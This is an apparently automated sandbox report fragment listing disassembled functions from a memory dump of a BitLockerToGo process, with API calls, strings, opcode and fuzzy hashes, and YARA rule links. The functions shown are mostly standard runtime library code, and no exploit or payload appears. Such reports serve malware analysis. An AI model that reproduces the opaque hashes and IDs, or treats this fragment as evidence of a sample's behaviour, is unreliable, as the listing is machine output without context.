Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 2212c43facfe6af665491d96806d7b3f52119fe99cd0a1461266b4a694c4a211
Instruction ID: aa878e36bf6ac81f7f1e7828e104cb61457adb022ffe42df7d0b516e50071d53
Opcode Fuzzy Hash: 2212c43facfe6af665491d96806d7b3f52119fe99cd0a1461266b4a694c4a211
Instruction Fuzzy Hash: CDB13E31510A099FD715CF28C48ABA57BE2FF45364F258658EA9ACF3A1C735ED82CB40

Function 006E22CA Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006E22E0

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 730208f5b03e0bce8bb3338b3f0f03cab81b821da16ea547c166b7791bbf0a61
Instruction ID: 7312e0b22426061c9468521c95f9af80da400269e7c287a858816246410dd004
Opcode Fuzzy Hash: 730208f5b03e0bce8bb3338b3f0f03cab81b821da16ea547c166b7791bbf0a61
Instruction Fuzzy Hash: BCA19DB1905302CBEB18CF55D8916AEBFB7FB48310F24A12AD415EB3A0D7B59A50CF60

Function 006EC481 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a36dbba02bf2fc150f97564a76e3c4011376e81ee4743c790af507a1e9306d0e
Instruction ID: bc67b1a9828a288dc876ed0c67eec53d49a1f17306ec5d70c7a4c49542fb1cac
Opcode Fuzzy Hash: a36dbba02bf2fc150f97564a76e3c4011376e81ee4743c790af507a1e9306d0e
Instruction Fuzzy Hash: 3141C2B1805259AECB24DF6ACC89EFABBBAAF45310F1442DDE409D3241DA359E858F50

Function 006E729D Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

0, xrefs: 006E7421

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 42221e9f03c3dfb6a216e4aa4bc48a01760d6c3c0fdf4ce053e4077c30a06748
Instruction ID: 27755c969af195817c038a3b90c945d267754cd27f4047184da89fcfd5520f69
Opcode Fuzzy Hash: 42221e9f03c3dfb6a216e4aa4bc48a01760d6c3c0fdf4ce053e4077c30a06748
Instruction Fuzzy Hash: 5FB1F43090A78B8BCB75CE6AC5556FEBBA3AF00300F24461DE892D7791DB309E02DB51

Function 006E2076 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00002082,006E19AE), ref: 006E207B

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cde57da3a79e6a87f0c7d810aec05a71ab125cbdd174a4b4b4d16c085b841449
Instruction ID: 2897dc78d770a876882c10514ba6d2eedb3b2f4c5191010aac5325a5060beb00
Opcode Fuzzy Hash: cde57da3a79e6a87f0c7d810aec05a71ab125cbdd174a4b4b4d16c085b841449
Instruction Fuzzy Hash:

Function 006EE5B2 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 006EE5B2

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ae1562b030efd25c46d658ad9ed8f5426444ada87f0268ad9a4c7591ccb96268
Instruction ID: b66b1208881bb68992923df952ae7b919db46587aa663dd534678a09f6b4378a
Opcode Fuzzy Hash: ae1562b030efd25c46d658ad9ed8f5426444ada87f0268ad9a4c7591ccb96268
Instruction Fuzzy Hash: E4A011302002028B83008F38AA0A32A3AEABA00288B00A238A802C2220EB208000EA08

Function 006E2CB0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006E2CE7
___except_validate_context_record.LIBVCRUNTIME ref: 006E2CEF
_ValidateLocalCookies.LIBCMT ref: 006E2D78
__IsNonwritableInCurrentImage.LIBCMT ref: 006E2DA3
_ValidateLocalCookies.LIBCMT ref: 006E2DF8

Strings

csm, xrefs: 006E2D8D
7*n, xrefs: 006E2D95, 006E2D9E, 006E2DAF

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: 7*n$csm
API String ID: 1170836740-226784482
Opcode ID: 940f441eb412d6a3fb58fdb57eebf15d180f6f067e2ebfca0b39e49c59c23511
Instruction ID: 261cdfea635226149c067c19b68c3494101371bf7e60f9ab489e54d72ca80103
Opcode Fuzzy Hash: 940f441eb412d6a3fb58fdb57eebf15d180f6f067e2ebfca0b39e49c59c23511
Instruction Fuzzy Hash: A241E630A0135A9BCF10DF6ACC95AAE7BBBAF05324F148059E9145B3A2C771DA01CB90

Function 006F3A40 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(008F6980,008F6980,?,7FFFFFFF,?,006F3D10,008F6980,008F6980,?,008F6980,?,?,?,?,008F6980,?), ref: 006F3AE6
__alloca_probe_16.LIBCMT ref: 006F3BA1
__alloca_probe_16.LIBCMT ref: 006F3C30
__freea.LIBCMT ref: 006F3C7B
__freea.LIBCMT ref: 006F3C81
__freea.LIBCMT ref: 006F3CB7
__freea.LIBCMT ref: 006F3CBD
__freea.LIBCMT ref: 006F3CCD

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 6ba4b83adbfe4a0da34db2fcbc884becdcea8679821b2f3f4b76ea431ebc540e
Instruction ID: f85a1ecc1a6dfe2574844cb5520ac8cfa047794e0516e2023b96022bcdf9e656
Opcode Fuzzy Hash: 6ba4b83adbfe4a0da34db2fcbc884becdcea8679821b2f3f4b76ea431ebc540e
Instruction Fuzzy Hash: 1671F572A0436DABDF219E548C42BFE7BBBAF55310F290159EB04BB381E635DE018764

Function 006EACAD Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 006EAD33

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 859f8dc02c0d924f0ac8cd8ad241f2096ee5bd756e0813663e7e818fbe506fee
Instruction ID: 6cb8f2cb9a5e0cde3d3c01b2702f6e787751e9d94c625f3abab5075e4b0618ca
Opcode Fuzzy Hash: 859f8dc02c0d924f0ac8cd8ad241f2096ee5bd756e0813663e7e818fbe506fee
Instruction Fuzzy Hash: 44B135729023D59FDB158FA5CC81BEE7FA6EF55310F144199E904AB382D270AD01C7A6

Function 006E333B Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006E345A
___TypeMatch.LIBVCRUNTIME ref: 006E3568
CallUnexpected.LIBVCRUNTIME ref: 006E36D5

Strings

csm, xrefs: 006E3378
csm, xrefs: 006E33E5
csm, xrefs: 006E3491

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: CallMatchTypeUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 1206542248-393685449
Opcode ID: 0b71a31bb691b94f356cebec38b9bdd80d1624ab9656f22c7818cbc82b7e580b
Instruction ID: f226aceed32ba0b412178de1c618c0edf57518bccbb328a5946cedcd41b58320
Opcode Fuzzy Hash: 0b71a31bb691b94f356cebec38b9bdd80d1624ab9656f22c7818cbc82b7e580b
Instruction Fuzzy Hash: 37B18A318023A9EFCF25DFA6C8899AEBBB6BF04310B14415AE8116B352D731DB51CF91

Function 006E3004 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006E2FFB,006E2BE3,006E20C6), ref: 006E3012
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006E3020
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006E3039
SetLastError.KERNEL32(00000000,006E2FFB,006E2BE3,006E20C6), ref: 006E308B

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 42464a8d4b03a811e8da802d2e57983b288704a3322d40074550181cfb912cd7
Instruction ID: ed607b9d798442dde7fc722269b818dd6ed07a1516adad48dd1649a92b0a217d
Opcode Fuzzy Hash: 42464a8d4b03a811e8da802d2e57983b288704a3322d40074550181cfb912cd7
Instruction Fuzzy Hash: 7C01D83214B3B65EE7642677AC896B72A47EB11B75730022DF510433F1EF934E55D148

Function 006ECA07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, xrefs: 006ECA23

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
API String ID: 0-3335149998
Opcode ID: 79e3155d272309d2360f40692456074b433a4542021df02fad3b37fed545ef6f
Instruction ID: f40cbf558b23978d66033edc69e18063c47f750f7ca8f79a5983efcc81bc545c
Opcode Fuzzy Hash: 79e3155d272309d2360f40692456074b433a4542021df02fad3b37fed545ef6f
Instruction Fuzzy Hash: 9F216572602389BFDB10EF7BCC41DAA77ABAF443747144529F81597250D731DC4297A4

Function 006E9290 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,97F6FAD1,?,?,00000000,006F5F21,000000FF,?,006E926C,006E9350,?,006E9240,00000000), ref: 006E92C5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006E92D7
FreeLibrary.KERNEL32(00000000,?,?,00000000,006F5F21,000000FF,?,006E926C,006E9350,?,006E9240,00000000), ref: 006E92F9

Strings

mscoree.dll, xrefs: 006E92BE
CorExitProcess, xrefs: 006E92CF

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: eaec7258b9b6471dedfeaf3fe5fc49069c6481cbe7deae9d78f40da9c7ac893a
Instruction ID: fd881af7099d120eea4ec2ac30b250a7b3fa711d898ce15db5b796c87db75c4d
Opcode Fuzzy Hash: eaec7258b9b6471dedfeaf3fe5fc49069c6481cbe7deae9d78f40da9c7ac893a
Instruction Fuzzy Hash: 7501AD72954659AFCB118F50DC09FBEBBBAFB04B14F100525F922E26E0DF79A900CA94

Function 006E4122 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,006E40D3,00000000,?,006FEDBC,?,?,?,006E4276,00000004,InitializeCriticalSectionEx,006F6CA0,InitializeCriticalSectionEx), ref: 006E412F
GetLastError.KERNEL32(?,006E40D3,00000000,?,006FEDBC,?,?,?,006E4276,00000004,InitializeCriticalSectionEx,006F6CA0,InitializeCriticalSectionEx,00000000,?,006E402D), ref: 006E4139
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006E4161

Strings

api-ms-, xrefs: 006E4146

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 3befe350e442994d0ebdaade4ab340fc785fa1e0b4a8d0eac6035222ad9aa58a
Instruction ID: 7029a38d03c5ed158d3d427ad01a6ce34c22bc25545e949e36be24efec7c5e85
Opcode Fuzzy Hash: 3befe350e442994d0ebdaade4ab340fc785fa1e0b4a8d0eac6035222ad9aa58a
Instruction Fuzzy Hash: E4E01A30694348B7EF101B72ED06FF93A56AB50B51F205060F90CE81A0DFA1D8949685

Function 006EF183 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(97F6FAD1,00000000,00000000,?), ref: 006EF1E6

Part of subcall function 006ED5BC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006F25BF,?,00000000,-00000008), ref: 006ED61D

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006EF438
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006EF47E
GetLastError.KERNEL32 ref: 006EF521

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 05a0762f142777bd0eff245852be24aa3fa4bb1b39220de079e891c89035a989
Instruction ID: 1f10072ae48cff7017dd218e3a7472a8202d5faa66a0a402bab3e822f9ba460f
Opcode Fuzzy Hash: 05a0762f142777bd0eff245852be24aa3fa4bb1b39220de079e891c89035a989
Instruction Fuzzy Hash: E1D16A75D01288DFDB14CFA9D8809EDBBF6FF09314F28456AE516EB352E630A942CB50

Function 006E30E4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 006E31AB
___AdjustPointer.LIBCMT ref: 006E31CE
___AdjustPointer.LIBCMT ref: 006E326A

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b24c487e519e00e9dc3988771ed91efa209cca49a41a2fe06594e63ad0b23d1c
Instruction ID: b56d4d707d1d69663366f6c61bd39111c46381e922a4268de29775e210daeba3
Opcode Fuzzy Hash: b24c487e519e00e9dc3988771ed91efa209cca49a41a2fe06594e63ad0b23d1c
Instruction Fuzzy Hash: D051E2726023A6AFDB288F16D949BEA77A7EF00700F24402DEA4547391E731EF45CB94

Function 006EC221 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 006ED5BC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006F25BF,?,00000000,-00000008), ref: 006ED61D

GetLastError.KERNEL32 ref: 006EC285
__dosmaperr.LIBCMT ref: 006EC28C
GetLastError.KERNEL32(?,?,?,?), ref: 006EC2C6
__dosmaperr.LIBCMT ref: 006EC2CD

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 47371e80a725b2c6c3fc4fce70047077a3a49468137aab409c865c559ffbcf5b
Instruction ID: 8e45133a09b2fdcd88eab4e4bf5ad853551f97b4d4c0dfe95779d39a16f462ca
Opcode Fuzzy Hash: 47371e80a725b2c6c3fc4fce70047077a3a49468137aab409c865c559ffbcf5b
Instruction Fuzzy Hash: 6E21A471602785AFDB21AFB7C8808AB7BABFF443747108519F91AD7240D731ED429BA4

Function 006ED65F Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 006ED667

Part of subcall function 006ED5BC: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006F25BF,?,00000000,-00000008), ref: 006ED61D

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006ED69F
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006ED6BF

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 67733ed8f14482b82cab6e05df8d303cbec22faca63591bc920f7356ea2c9c14
Instruction ID: 7b3f49c025874048a8f6dd72d84a8d3d1b9bcf86b79a6fb6bf97e55a740e4537
Opcode Fuzzy Hash: 67733ed8f14482b82cab6e05df8d303cbec22faca63591bc920f7356ea2c9c14
Instruction Fuzzy Hash: 1211C4B1503BA67EAB112BB79C89CBF7B6FDE85398B240419F80691101EE70DD01857D

Function 006F3D7A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000), ref: 006F3D91
GetLastError.KERNEL32(?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000,?,?,?,006EFB18,?), ref: 006F3D9D

Part of subcall function 006F3D63: CloseHandle.KERNEL32(FFFFFFFE,006F3DAD,?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000,?,?), ref: 006F3D73

___initconout.LIBCMT ref: 006F3DAD

Part of subcall function 006F3D25: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006F3D54,006F2E10,?,?,006EF575,?,00000000,00000000,?), ref: 006F3D38

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,006F2E23,00000000,00000001,?,?,?,006EF575,?,00000000,00000000,?), ref: 006F3DC2

Memory Dump Source

Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: bf96ba4b8dede732f7944b7ffdac0c7f141b1fa4aa3f23a842ed6f7f35cadca6
Instruction ID: 29c1d3fe29e452dab1a1ca019c43b04244b2801269062c99962360406ff1779e
Opcode Fuzzy Hash: bf96ba4b8dede732f7944b7ffdac0c7f141b1fa4aa3f23a842ed6f7f35cadca6
Instruction Fuzzy Hash: F9F0C93650112DBBCF622FD5EC08DAA3F27FF093B1B145414FA1995270DA328A60EBA0

Function 006E36E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 006E3705

Strings

RCC, xrefs: 006E371F
MOC, xrefs: 006E3717

